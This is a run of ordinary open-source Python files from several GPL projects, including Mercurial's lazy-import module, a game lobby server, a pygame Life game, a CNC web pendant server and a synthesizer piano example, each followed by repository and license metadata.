parent.user.user if parent.is_fork else None,
but_uids=pr_uids,
)
else:
pagure.lib.tasks.refresh_pr_cache.delay(
parent.name,
parent.namespace,
parent.user.user if parent.is_fork else None,
but_uids=pr_uids,
)
if not project.is_on_repospanner and _config.get(
"GIT_GARBAGE_COLLECT", False
):
pagure.lib.tasks.git_garbage_collect.delay(
project.repopath("main")
)
class Default(BaseHook):
""" Default hooks. """
name = "default"
description = (
"Default hooks that should be enabled for each and every project."
)
runner = DefaultRunner
@classmethod
def is_enabled_for(cls, project):
return True
|
pypingou/pagure
|
pagure/hooks/default.py
|
Python
|
gpl-2.0
| 12,080
|
# Portions Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# demandimport.py - global demand-loading of modules for Mercurial
#
# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""
demandimport - automatic demandloading of modules
To enable this module, do:
import demandimport; demandimport.enable()
Imports of the following forms will be demand-loaded:
import a, b.c
import a.b as c
from a import b,c # a will be loaded immediately
These imports will not be delayed:
from a import *
b = __import__(a)
"""
from __future__ import absolute_import
# pyre-fixme[21]: Could not find `__builtin__`.
import __builtin__ as builtins
import contextlib
import sys
contextmanager = contextlib.contextmanager
_origimport = __import__
nothing = object()
def _hgextimport(importfunc, name, globals, *args, **kwargs):
try:
return importfunc(name, globals, *args, **kwargs)
except ImportError:
if not globals:
raise
# extensions are loaded with "hgext_" prefix
hgextname = "hgext_%s" % name
nameroot = hgextname.split(".", 1)[0]
contextroot = globals.get("__name__", "").split(".", 1)[0]
if nameroot != contextroot:
raise
# retry to import with "hgext_" prefix
return importfunc(hgextname, globals, *args, **kwargs)
class _demandmod(object):
"""module demand-loader and proxy
Specify 1 as 'level' argument at construction, to import module
relatively.
"""
def __init__(self, name, globals, locals, level):
if "." in name:
head, rest = name.split(".", 1)
after = [rest]
else:
head = name
after = []
object.__setattr__(self, r"_data", (head, globals, locals, after, level, set()))
object.__setattr__(self, r"_module", None)
def _extend(self, name):
"""add to the list of submodules to load"""
self._data[3].append(name)
def _addref(self, name):
"""Record that the named module ``name`` imports this module.
References to this proxy class having the name of this module will be
replaced at module load time. We assume the symbol inside the importing
module is identical to the "head" name of this module. We don't
actually know if "as X" syntax is being used to change the symbol name
because this information isn't exposed to __import__.
"""
self._data[5].add(name)
def _load(self):
if not self._module:
head, globals, locals, after, level, modrefs = self._data
mod = _hgextimport(_origimport, head, globals, locals, None, level)
if mod is self:
# In this case, _hgextimport() above should imply
# _demandimport(). Otherwise, _hgextimport() never
# returns _demandmod. This isn't intentional behavior,
# in fact. (see also issue5304 for detail)
#
# If self._module is already bound at this point, self
# should be already _load()-ed while _hgextimport().
# Otherwise, there is no way to import actual module
# as expected, because (re-)invoking _hgextimport()
# should cause same result.
# This is reason why _load() returns without any more
# setup but assumes self to be already bound.
mod = self._module
assert mod and mod is not self, "%s, %s" % (self, mod)
return
# load submodules
def subload(mod, p):
h, t = p, None
if "." in p:
h, t = p.split(".", 1)
if getattr(mod, h, nothing) is nothing:
setattr(mod, h, _demandmod(p, mod.__dict__, mod.__dict__, level=1))
elif t:
subload(getattr(mod, h), t)
for x in after:
subload(mod, x)
# Replace references to this proxy instance with the actual module.
if locals:
if locals.get(head) is self:
locals[head] = mod
elif locals.get(head + r"mod") is self:
locals[head + r"mod"] = mod
for modname in modrefs:
modref = sys.modules.get(modname, None)
if modref and getattr(modref, head, None) is self:
setattr(modref, head, mod)
object.__setattr__(self, r"_module", mod)
def __repr__(self):
if self._module:
return "<proxied module '%s'>" % self._data[0]
return "<unloaded module '%s'>" % self._data[0]
def __call__(self, *args, **kwargs):
raise TypeError("%s object is not callable" % repr(self))
def __getattr__(self, attr):
self._load()
return getattr(self._module, attr)
def __setattr__(self, attr, val):
self._load()
setattr(self._module, attr, val)
@property
def __dict__(self):
self._load()
return self._module.__dict__
@property
def __doc__(self):
self._load()
return self._module.__doc__
_pypy = "__pypy__" in sys.builtin_module_names
def _demandimport(name, globals=None, locals=None, fromlist=None, level=-1):
if locals is None or name in ignore or fromlist == ("*",):
# these cases we can't really delay
return _hgextimport(_origimport, name, globals, locals, fromlist, level)
elif not fromlist:
# import a [as b]
if "." in name: # a.b
base, rest = name.split(".", 1)
# email.__init__ loading email.mime
if globals and globals.get("__name__", None) == base:
return _origimport(name, globals, locals, fromlist, level)
# if a is already demand-loaded, add b to its submodule list
if base in locals:
if isinstance(locals[base], _demandmod):
locals[base]._extend(rest)
return locals[base]
return _demandmod(name, globals, locals, level)
else:
# There is a fromlist.
# from a import b,c,d
# from . import b,c,d
# from .a import b,c,d
# level == -1: relative and absolute attempted (Python 2 only).
# level >= 0: absolute only (Python 2 w/ absolute_import and Python 3).
# The modern Mercurial convention is to use absolute_import everywhere,
# so modern Mercurial code will have level >= 0.
# The name of the module the import statement is located in.
globalname = globals.get("__name__")
def processfromitem(mod, attr):
"""Process an imported symbol in the import statement.
If the symbol doesn't exist in the parent module, and if the
parent module is a package, it must be a module. We set missing
modules up as _demandmod instances.
"""
symbol = getattr(mod, attr, nothing)
nonpkg = getattr(mod, "__path__", nothing) is nothing
if symbol is nothing:
if nonpkg:
# do not try relative import, which would raise ValueError,
# and leave unknown attribute as the default __import__()
# would do. the missing attribute will be detected later
# while processing the import statement.
return
mn = "%s.%s" % (mod.__name__, attr)
if mn in ignore:
importfunc = _origimport
else:
importfunc = _demandmod
symbol = importfunc(attr, mod.__dict__, locals, level=1)
setattr(mod, attr, symbol)
# Record the importing module references this symbol so we can
# replace the symbol with the actual module instance at load
# time.
if globalname and isinstance(symbol, _demandmod):
symbol._addref(globalname)
def chainmodules(rootmod, modname):
# recurse down the module chain, and return the leaf module
mod = rootmod
for comp in modname.split(".")[1:]:
obj = getattr(mod, comp, nothing)
if obj is nothing:
obj = _demandmod(comp, mod.__dict__, mod.__dict__, level=1)
setattr(mod, comp, obj)
elif mod.__name__ + "." + comp in sys.modules:
# prefer loaded module over attribute (issue5617)
obj = sys.modules[mod.__name__ + "." + comp]
mod = obj
return mod
if level >= 0:
if name:
# "from a import b" or "from .a import b" style
rootmod = _hgextimport(_origimport, name, globals, locals, level=level)
mod = chainmodules(rootmod, name)
elif _pypy:
# PyPy's __import__ throws an exception if invoked
# with an empty name and no fromlist. Recreate the
# desired behaviour by hand.
mn = globalname
mod = sys.modules[mn]
if getattr(mod, "__path__", nothing) is nothing:
mn = mn.rsplit(".", 1)[0]
mod = sys.modules[mn]
if level > 1:
mn = mn.rsplit(".", level - 1)[0]
mod = sys.modules[mn]
else:
mod = _hgextimport(_origimport, name, globals, locals, level=level)
for x in fromlist:
processfromitem(mod, x)
return mod
# But, we still need to support lazy loading of standard library and 3rd
# party modules. So handle level == -1.
mod = _hgextimport(_origimport, name, globals, locals)
mod = chainmodules(mod, name)
for x in fromlist:
processfromitem(mod, x)
return mod
ignore = set()
def init(ignorelist):
global ignore
ignore = set(ignorelist)
def isenabled():
return builtins.__import__ == _demandimport
def enable():
"enable global demand-loading of modules"
builtins.__import__ = _demandimport
def disable():
"disable global demand-loading of modules"
builtins.__import__ = _origimport
@contextmanager
def deactivated():
"context manager for disabling demandimport in 'with' blocks"
demandenabled = isenabled()
if demandenabled:
disable()
try:
yield
finally:
if demandenabled:
enable()
|
facebookexperimental/eden
|
eden/scm/edenscm/hgdemandimport/demandimportpy2.py
|
Python
|
gpl-2.0
| 10,941
|
# -*- coding: utf-8 -*-
# Ocvfw
#
# Copyright 2009 Flavio Percoco Premoli
#
# This file is part of Ocvfw.
#
# Ocvfw is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2 as published
# by the Free Software Foundation.
#
# Ocvfw is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ocvfw. If not, see <http://www.gnu.org/licenses/>>.
"""Ocvfw Global Vars."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2008 Flavio Percoco Premoli"
__license__ = "GPLv2"
import os
from . import debug
abs_path = os.path.abspath(os.path.dirname(__file__))
haar_cds = { 'Face' : "%s/haars/haarcascade_frontalface_alt.xml" % abs_path,
'Eyes' : "%s/haars/frontalEyes35x16.xml" % abs_path,
#'Eyes' : "../ocvfw/haars/haarcascade_eye_tree_eyeglasses.xml",
'Mouth' : "%s/haars/Mouth.xml" % abs_path}
colors = { "gray" : { "ch" : 1 },
"rgb" : { "ch" : 3 },
"bgr" : { "ch" : 3 }}
# CV common lib
cv = None
# Highgui common lib
hg = None
def get_ch(color):
return colors[color]["ch"]
def singleton(cls):
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls()
debug.debug("Commons", "New Singleton Add (%s)" % cls)
return instances[cls]
return getinstance
|
lhotchkiss/mousetrap
|
src/mousetrap/ocvfw/commons.py
|
Python
|
gpl-2.0
| 1,675
|
# -*- coding: utf-8 -*-
# vim: set et sts=4 sw=4 encoding=utf-8:
#
# This file is part of Warzone 2100.
# Copyright (C) 2011 Warzone 2100 Project
#
# Warzone 2100 is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Warzone 2100 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Warzone 2100; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
###############################################################################
__all__ = ['GameDB']
from itertools import count as iterCount
from twisted.internet import defer
from twisted.python import log
from twisted.internet.task import LoopingCall
from UserDict import IterableUserDict
from wzlobby.game import Game
from wzlobby.tools import testConnect
from wzlobby import settings
class GameDB(IterableUserDict):
def __init__(self):
self.data = {}
self.numgen = iterCount(1)
def create(self, lobby_ver, register=False):
game_id = self.numgen.next()
game = Game(lobby_ver, game_id)
if settings.debug:
log.msg('Created game: %d' % game_id)
if register:
self.register(game)
return game
def register(self, game):
self.data[game['gameId']] = game
def updateGame(self, game_id, infos):
if not game_id in self.data:
log.err('Unknown game %s' % game_id)
return False
self.data[game_id].update(infos)
return True
def remove(self, game):
try:
del(self.data[game['gameId']])
log.msg('Removed game: %d' % game['gameId'])
except KeyError:
return False
return True
def check(self, game):
""" Starts a loop which checks the given game every settings.check_interval seconds
"""
if game['host'] is None or game['description'] is None:
return defer.fail(Exception('Ignoring empty games.'))
hostname = game['description'].lower().split(' ')
if not settings.badwords.isdisjoint(hostname):
log.msg('Game name not acceptable.')
return defer.fail(Exception('Game name not acceptable. The game is NOT hosted, change the name of your game.'))
if game.lCall and game.lCall.running:
game.lCall.stop()
d = self._check(game)
d.addCallback(lambda x: settings.getMotd(game['multiVer']))
# Start the loopingcall
if not game.lCall:
game.lCall = LoopingCall(self._check, game)
d2 = game.lCall.start(settings.check_interval, now=False)
# Ignore future errors on the LoopingCall
d2.addErrback(lambda x: '')
return d
def _check(self, game):
""" Check the game for its connectivity and removes it on failures.
returns a C{twisted.internet.defer.Deferred}
"""
def remove(failure):
self.remove(game)
return defer.fail(Exception('Game unreachable, failed to open a connection to port %d.' % game['port']))
d = testConnect(game['host'], game['port'])
d.addErrback(remove)
return d
|
pcdummy/wzlobbyserver-ng
|
wzlobby/gamedb.py
|
Python
|
gpl-2.0
| 3,626
|
from django.conf.urls import patterns, url
from database import views
from djgeojson.views import GeoJSONLayerView
from database.models import DatabaseEntry
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^collections/$', views.collections, name='collections'),
url(r'^map_json/$', views.MapLayer.as_view(
model=DatabaseEntry,
properties=['popupcontent','violation'],
),
name='incidents'),
url(r'^map/$', views.map, name='map'),
url(r'^collection/(?P<id>[0-9]+)/$', views.collection, name='collection'),
url(r'^(?P<slug>[0-9]+)/$', views.detail, name='detail')
)
|
crito/syrianarchive
|
database/urls.py
|
Python
|
gpl-2.0
| 637
|
# -*- mode:python; coding:utf-8; -*-
# created: 06.07.2010 19:19
# description: Bomberbot radius bonuse representation
class Radius(object):
def __init__(self, x, y):
"""
@type x: int
@param x: X position.
@type y: int
@param y: Y position.
"""
self.x = x
self.y = y
|
eugenezamriy/bomberbot
|
bomberlib/radius.py
|
Python
|
gpl-2.0
| 340
|
#!/usr/bin/env python
"""
This file is part of Life Fighter.
"""
#Import Modules
import pygame
from pygame.locals import *
from sprites import *
if not pygame.font: print 'Warning, fonts disabled'
if not pygame.mixer: print 'Warning, sound disabled'
#Defined values
WINDOW_TITLE = "Life Fighter 0.01"
width = 800
height = 600
#n = 10
n1 = 18
n2 = 14
#if n < 20:
# line = 2
#else:
# line = 1
line = 1
x_off = 25
y_off = 75
#step = (width - 2 * x_off) / n1
#step = (height - 2 * y_off) / n2
step = 35
def main():
#Initialize Everything
pygame.init()
screen = pygame.display.set_mode((width, height))
pygame.display.set_caption(WINDOW_TITLE)
#Create The Backgound
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill(bg_color)
#Display The Background
screen.blit(background, (0, 0))
#pygame.display.flip()
grid = Grid(n1, n2, x_off, y_off, step, line)
#gridGroup = pygame.sprite.RenderUpdates()#no pude user GroupSingle :(
#gridGroup.add(grid)
cellsGroup = pygame.sprite.RenderUpdates()
#Test
glider = [(1,0), (2,1), (0,2), (1,2), (2,2)]
other = [(5,5), (5,6), (5,7)]
for key in glider + other:
grid.cells[key].birth_now()
#cellsGroup.add(grid.cells[key])
grid.set_hero(2,1)
#ENT Test
for key in grid.cells:
cellsGroup.add(grid.cells[key])
#gridGroup.draw(screen)
screen.blit(grid.image, grid.rect)
cellsGroup.draw(screen)
pygame.display.flip()
clock = pygame.time.Clock()
#Main loop
while True:
clock.tick(10) #slower than 10 frame per second
for event in pygame.event.get():
if event.type == QUIT:
return
if event.type == KEYDOWN:
if event.key == K_SPACE:
grid.beat()
elif event.key == K_LEFT:
grid.hero_left()
elif event.key == K_RIGHT:
grid.hero_right()
elif event.key == K_UP:
grid.hero_up()
elif event.key == K_DOWN:
grid.hero_down()
screen.blit(grid.image, grid.rect)
#cellsGroup.empty()
#cellsGroup.add(alive_cells)
cellsGroup.draw(screen)
pygame.display.flip()
#pygame.display.update(rects)
if __name__ == '__main__':
main()
|
jjconti/life-fighter
|
extra/old/game.py
|
Python
|
gpl-2.0
| 2,468
|
# -*- coding: latin1 -*-
# $Id: CNCPendant.py,v 1.3 2014/10/15 15:04:48 bnv Exp bnv $
#
# Author: Vasilis.Vlachoudis@cern.ch
# Date: 06-Oct-2014
__author__ = "Vasilis Vlachoudis"
__email__ = "Vasilis.Vlachoudis@cern.ch"
import os
import sys
#import cgi
import json
import threading
import urllib
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
try:
import BaseHTTPServer as HTTPServer
except ImportError:
import http.server as HTTPServer
HOSTNAME = "localhost"
port = 8080
httpd = None
prgpath = os.path.abspath(os.path.dirname(sys.argv[0]))
#==============================================================================
# Simple Pendant controller for CNC
#==============================================================================
class Pendant(HTTPServer.BaseHTTPRequestHandler):
#----------------------------------------------------------------------
def log_message(self, fmt, *args):
# Only requests to the main page log them, all other ignore
if args[0].startswith("GET / "):
HTTPServer.BaseHTTPRequestHandler.log_message(self, fmt, *args)
#----------------------------------------------------------------------
def do_HEAD(self, rc=200, content="text/html"):
self.send_response(rc)
self.send_header("Content-type", content)
self.end_headers()
#----------------------------------------------------------------------
def do_GET(self):
"""Respond to a GET request."""
if "?" in self.path:
page,arg = self.path.split("?",1)
arg = dict(urlparse.parse_qsl(arg))
else:
page = self.path
arg = None
#print self.path,type(self.path)
#print page
#print arg
if page == "/send":
if arg is None: return
for key,value in arg.items():
if key=="gcode":
for line in value.split('\n'):
httpd.app.queue.put(line+"\n")
elif key=="cmd":
httpd.app.pendant.put(urllib.unquote(value))
#send empty response so browser does not generate errors
self.do_HEAD(200, "text/text")
self.wfile.write("")
elif page == "/state":
self.do_HEAD(200, "text/text")
self.wfile.write(json.dumps(httpd.app._pos))
elif page == "/config":
self.do_HEAD(200, "text/text")
snd = {}
snd["rpmmax"] = httpd.app.get("CNC","spindlemax")
self.wfile.write(json.dumps(snd))
elif page == "/icon":
if arg is None: return
self.do_HEAD(200, "image/gif")
filename = os.path.join(
os.path.abspath(
os.path.dirname(sys.argv[0])),
"icons",
arg["name"]+".gif")
try:
f = open(filename,"rb")
self.wfile.write(f.read())
f.close()
except:
pass
else:
self.mainPage(page[1:])
# ---------------------------------------------------------------------
def mainPage(self, page):
global prgpath
#handle certain filetypes
filetype = page.rpartition('.')[2]
if filetype == "css": self.do_HEAD(content="text/css")
elif filetype == "js": self.do_HEAD(content="text/javascript")
else: self.do_HEAD()
if page == "": page = "index.html"
try:
f = open(os.path.join(prgpath,page),"r")
self.wfile.write(f.read())
f.close()
except IOError:
self.wfile.write("""<!DOCTYPE html>
<html>
<head>
<title>Errortitle</title>
<meta name="viewport" content="width=device-width,initial-scale=1, user-scalable=yes" />
</head>
<body>
Page not found.
</body>
</html>
""")
# -----------------------------------------------------------------------------
def _server(app):
global httpd
server_class = HTTPServer.HTTPServer
try:
httpd = server_class(('', port), Pendant)
httpd.app = app
httpd.serve_forever()
except:
httpd = None
# -----------------------------------------------------------------------------
def start(app):
global httpd
if httpd is not None: return False
thread = threading.Thread(target=_server, args=(app,))
thread.start()
return True
# -----------------------------------------------------------------------------
def stop():
global httpd
if httpd is None: return False
httpd.shutdown()
httpd = None
return True
if __name__ == '__main__':
start()
|
mandrav/bCNC
|
CNCPendant.py
|
Python
|
gpl-2.0
| 4,047
|
"""
$Id: piano.py 852 2014-06-29 22:13:08Z weegreenblobbie $
Nsound is a C++ library and Python module for audio synthesis featuring
dynamic digital filters. Nsound lets you easily shape waveforms and write
to disk or plot them. Nsound aims to be as powerful as Csound but easy to
use.
Copyright (c) 2004 to Present Nick Hilton
weegreenblobbie_at_yahoo_com
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Library General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
from queue import Queue
import argparse
import multiprocessing
import sys
import time
import pygame
import Nsound as ns
#------------------------------------------------------------------------------
# Globals
N_THREADS = 3
SR = 48000.0
CHANNELS = 1
N_BUFFERS = 10
T = 0.01
# Higher latency on non-Linux platforms
if 'linux' not in sys.platform:
T = 0.05
N_BUFFERS = 3
# worker state machine
enum = 0
WAITING = enum ; enum += 1
PLAYING = enum ; enum += 1
RELEASING = enum; enum += 1
SINE = enum; enum += 1
SAW = enum; enum += 1
SQUARE = enum; enum += 1
# Random seed for chorus
#~rng = ns.RngTausworthe()
#~seed = rng.get()
#~print("seed = ", seed)
seed = 1108683026
def worker(q, generator, n_harmonics, chorus):
#--------------------------------------------------------------------------
# Initialize
if generator == SINE:
gen = ns.Sine(SR)
elif generator == SAW:
gen = ns.Sawtooth(SR, n_harmonics)
elif generator == SQUARE:
gen = ns.Square(SR, n_harmonics)
else:
raise RuntimeError("Unknown generator %d" % generator)
if chorus > 1:
# Need to use same random number geneator accross workers.
rng = gen.getRandomNumberGenerator()
rng.setSeed(seed)
gen.setChorus(chorus, 0.01)
gen.setRealtime(True)
try:
playback = ns.AudioPlaybackRt(SR, CHANNELS, N_BUFFERS, T)
#playback.setBufferUnderrunMode(ns.BUM_NOISE)
except:
q.put(False)
sys.stderr.write("FAILURE: failed to create audio playback object!\n")
sys.stderr.flush()
return
# Sharper envelope
env = ns.EnvelopeAdsr(SR, 0.2, 0.4, 0.333, 0.1)
# Tell the main thread we succeeded in initializing our
# nsound objects.
q.put(True)
while q.full():
pass
key_on = None
state = WAITING
dur = T
N_SAMPLES = int(dur * SR + 0.5)
#--------------------------------------------------------------------------
# Sound processing loop
process_key = False
while True:
try:
x = q.get(False)
process_key = True
except Queue.Empty:
process_key = False
if process_key:
if x == "QUIT":
playback.stop()
return
if state == WAITING:
freq = x
key_on = True
state = PLAYING
elif state == PLAYING:
key_on = False
state = RELEASING
if state == WAITING:
continue
for i in range(N_SAMPLES):
sample = env.shape(0.333 * gen.generate(freq), key_on)
playback.play(sample)
# Finished? state transition
if state == RELEASING:
if env.is_done():
state = WAITING
playback.stop()
gen.reset()
env.reset()
def main():
parser = argparse.ArgumentParser(description = 'Simple piano.')
parser.add_argument(
'--chorus',
dest = 'CHORUS',
default = 0,
type = int,
help = 'Add chorus with N voices')
parser.add_argument(
'--saw',
dest = 'USE_SAW',
action = 'store_true',
default = False,
help = 'Generate Sawtooth waves')
parser.add_argument(
'--square',
dest = 'USE_SQUARE',
action = 'store_true',
default = False,
help = 'Generate Square waves')
parser.add_argument(
'--n',
dest = 'N_HARMONICS',
type = int,
default = None,
help = """Specify the number of harmonics for Sawtooth or Square
generators (default is 7)""")
parser.add_argument(
'-j',
'--jack',
dest = 'use_jack',
default = False,
action = 'store_true',
help = """Use the JACK portaudio Host API, if the JACK server isn't
running, you will get undefined behavior""")
args = parser.parse_args()
if args.use_jack:
print("Will try to use JACK (known to work on Linux)")
ns.AudioPlaybackRt.use_jack(True)
generator = SINE
n_harmonics = 7
chorus = args.CHORUS
if args.USE_SAW:
generator = SAW
elif args.USE_SQUARE:
generator = SQUARE
if args.N_HARMONICS is not None:
if args.N_HARMONICS <= 0:
raise ValueError("N harmonics must be >= 1")
n_harmonics = args.N_HARMONICS
# Mapy keys to frequencies
key_to_freq = {
pygame.K_z: 261.626,
pygame.K_s: 277.183,
pygame.K_x: 293.665,
pygame.K_d: 311.127,
pygame.K_c: 329.628,
pygame.K_v: 349.228,
pygame.K_g: 369.994,
pygame.K_b: 391.995,
pygame.K_h: 415.305,
pygame.K_n: 440.000,
pygame.K_j: 466.164,
pygame.K_m: 493.883,
}
q_pool = []
q_idle = set()
p_pool = []
for i in range(N_THREADS):
q = multiprocessing.Queue(maxsize = 1)
p = multiprocessing.Process(
target = worker,
args = (q, generator, n_harmonics, chorus) )
p.start()
# Read from the Queue that the process initialized and is ready.
good = q.get()
if not good:
sys.exit(1)
q_idle.add(q)
q_pool.append(q)
p_pool.append(p)
key_to_queue = {}
# Init only the display, otherwise when using JACK Audio Connection Kit,
# pygame won't exit cleanly.
pygame.display.init()
# Open window
window = pygame.display.set_mode((400, 100))
pygame.display.set_caption("Piano! %s" % ns.__package__)
# Turn off key repeats
pygame.key.set_repeat()
print("Hello Piano!")
print("Press ESC to quit.")
print("Press [z,s,x,d,c,v,g,b,h,n,j,m] to play a note.")
main_loop = True
while main_loop:
event = pygame.event.wait()
if event.type == pygame.KEYDOWN:
c = event.key
# Break out of loop
if c in [pygame.K_ESCAPE]:
main_loop = False
break
if c in key_to_freq:
if len(q_idle) == 0:
print("no worker thread available!")
continue
freq = key_to_freq[c]
q = q_idle.pop()
key_to_queue[c] = q
q.put(freq)
sys.stdout.write("+")
sys.stdout.flush()
elif event.type == pygame.KEYUP:
c = event.key
if c in key_to_queue:
q = key_to_queue[c]
q.put(None)
del key_to_queue[c]
q_idle.add(q)
sys.stdout.write("-")
sys.stdout.flush()
elif event.type == pygame.QUIT:
main_loop = False
break
for q in q_pool:
q.put("QUIT")
for p in p_pool:
p.join()
pygame.display.quit()
print("")
print("Goodbye!")
if __name__ == "__main__":
main()
|
weegreenblobbie/nsound
|
src/examples/piano.py
|
Python
|
gpl-2.0
| 8,172
|
#!/usr/bin/python
import btcpos
import threading
import Queue
identifier=''
forwardingaddress=''
password=''
logfile=''
#eg: identifier='6ne3m2m7-6534-2k6l-2h1b-59v2xm0g8yio'
# password='mypassword'
# forwardingaddress='17yHkgQooxxMdB7iqNbBXDrV8YdMrMes5d'
# logfile='/path/to/btcpos.csv'
p= btcpos.POS(identifier,password,forwardingaddress,logfile)
t= threading.Thread(target=p.transactionLoop)
t.start()
p.gui.mainloop()
|
WeMeetAgain/btcpos
|
run.py
|
Python
|
gpl-2.0
| 433
|
from Vault import Vault
from PropertyInterface import PropertyInterface
from main.Control import Control
from plugin.Interface import Interface
from copy import deepcopy
#
# Wrapper for controls.
#
class ControlWrapper(object):
def __init__(self, control, size):
self.__dict__["_ControlWrapper__length"] = size
if size <= 0:
size = 1
# We need to deepcopy in order to get individually changeable
# Control instances
try:
self.__dict__["_ControlWrapper__control"] = \
Vault( [ deepcopy(control)
for i in range(size) ] )
except:
self.__dict__["_ControlWrapper__control"] = \
Vault( [ control ] )
if self.__length > 0:
log(_("Error: Control %s can't be replicated! This is a BUG in the Desklet!"
"\nThings probably won't work right for you.") % control)
self.__dict__["_ControlWrapper__length"] = 0
size = 1
else:
# Initialize all initial copies
for ctl in self.__dict__["_ControlWrapper__control"](open):
ctl.__init__()
# Keep an original copy around for extending the array
self.__dict__["_ControlWrapper__original_control"] = Vault(control)
# deactivate the original control
ctl = self.__dict__["_ControlWrapper__original_control"](open)
ctl.stop()
# Create a property handler for each deep copy of control
self.__dict__["_ControlWrapper__properties"] = \
[ PropertyInterface(self.__control(open)[i])
for i in range(size) ]
ids = [ Interface.get_id(i)
for i in Interface.get_interfaces( control.__class__ ) ]
taz_ids = [ Interface.get_taz_style_id(i)
for i in Interface.get_interfaces( control.__class__ ) ]
self.__dict__["_ControlWrapper__ifaces_id"] = \
Vault( tuple(ids + taz_ids) )
def __len__(self):
return self.__length
def __setattr__(self, name, value):
if self.__length > 0:
if name == "length":
# A little bounds checking
size = value
if value < 0:
value = 0
log(_("Warning: Value of property \"length\" must " \
"be >= 0 (setting to %d)" % value))
if value == 0:
log(_("Warning: Setting value of property " \
"\"length\" to 0 would disable list mode"))
size = 1
# Don't do anything if value isn't changing
if size != self.__length:
if size > self.__length:
# Append new copies of the control
self.__dict__["_ControlWrapper__control"] = \
Vault( self.__control(open) + \
[ deepcopy(self.__original_control(open)) \
for i in range(self.__length, size) ] )
# Initialize all new copies of the control
for ctl in [ self.__dict__["_ControlWrapper__control"](open)[i] \
for i in range(self.__length, size) ]:
ctl.__init__()
# Append new PropertyInterface instances
self.__dict__["_ControlWrapper__properties"] = \
self.__properties + \
[ PropertyInterface(self.__control(open)[i]) \
for i in range(self.__length, size) ]
elif size < self.__length:
# We want to leave the "0th" item alone, which is
# handled by the above conditionals
for i in range(size, self.__length):
del self[size]
self.__dict__["_ControlWrapper__length"] = value
else: # name != "length"
# This is the case where someone tries to set a property
# of this class when the length != 0. They should know
# better if they've gone and changed the length, but we'll
# be nice and print out some informational warnings.
log(_("Warning: Property \"%(property)s\" must be " \
"indexed (length == %(length)d).") % \
{'property': name, 'length': self.__length})
return
else: # length <= 0
# Backwards compatibility
self.__dict__["_ControlWrapper__properties"][0].__setattr__(name, value)
def __getattr__(self, name):
if name in Control.AUTHORIZED_METHODS:
if self.__length <= 0:
return getattr(self.__control(open)[0], name)
else:
return self.__control(open)
if self.__length <= 0:
# Backwards compatibility
return self.__dict__["_ControlWrapper__properties"][0].__getattr__(name)
elif name == "length":
return self.__length
else:
# This is the case where someone tries to set a property
# of this class when the length != 0. They should know
# better if they've gone and changed the length, but we'll
# be nice and print out some informational warnings.
log(_("Warning: Property \"%(property)s\" must be " \
"indexed (length == %(length)d).") % \
{'property': name, 'length': self.__length})
return
def __setitem__(self, idx, value):
if self.__length <= 0:
log(_("Warning: Control not initialized as an array in Desklet."))
raise IndexError
if (idx >= self.__length) or (idx + self.__length < 0):
raise IndexError("%d doesn't exist, length is %d" % (idx, self.__length))
return self.__properties[idx]
def __getitem__(self, idx):
if self.__length <= 0:
log(_("Warning: Control not initialized as an array in Desklet."))
raise IndexError
if (idx >= self.__length) or (idx + self.__length < 0):
raise IndexError("%d doesn't exist, length is %d" % (idx, self.__length))
return self.__properties[idx]
def __delitem__(self, idx):
if self.__length > 0:
if idx < 0:
idx = self.__length + idx
if idx < self.__length and idx >= 0:
# As long as we delete the same index of __control, there will be
# no property that uses that Control
del self.__dict__["_ControlWrapper__properties"][idx]
new_ctrl_list = self.__dict__["_ControlWrapper__control"](open)
new_ctrl_list[idx].stop()
del new_ctrl_list[idx]
#del self.__dict__["_ControlWrapper__control"]
self.__dict__["_ControlWrapper__control"] = Vault( new_ctrl_list )
self.__dict__["_ControlWrapper__length"] -= 1
else:
log(_("Warning: Trying to delete index %(index)d " \
"when length is %(length)d.") % \
{'index': idx, 'length': self.__length})
else:
log(_("Warning: Control not initialized as an array in Desklet; not deleting anything."))
def stop(self):
for c in self.__dict__["_ControlWrapper__control"](open):
try:
c.stop()
except StandardError, exc:
import traceback; traceback.print_exc()
log(_("Could not stop control %s" % c))
del c
# original control is already stopped
c = self.__dict__["_ControlWrapper__original_control"](open)
del c
def get_interfaces_id(self):
"""
@return : implemented interfaces' id
@rtype : list of str
"""
return self.__ifaces_id(open)
|
RaumZeit/gdesklets-core
|
scripting/ControlWrapper.py
|
Python
|
gpl-2.0
| 8,297
|
#############################################################################
##
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the test suite of PySide2.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
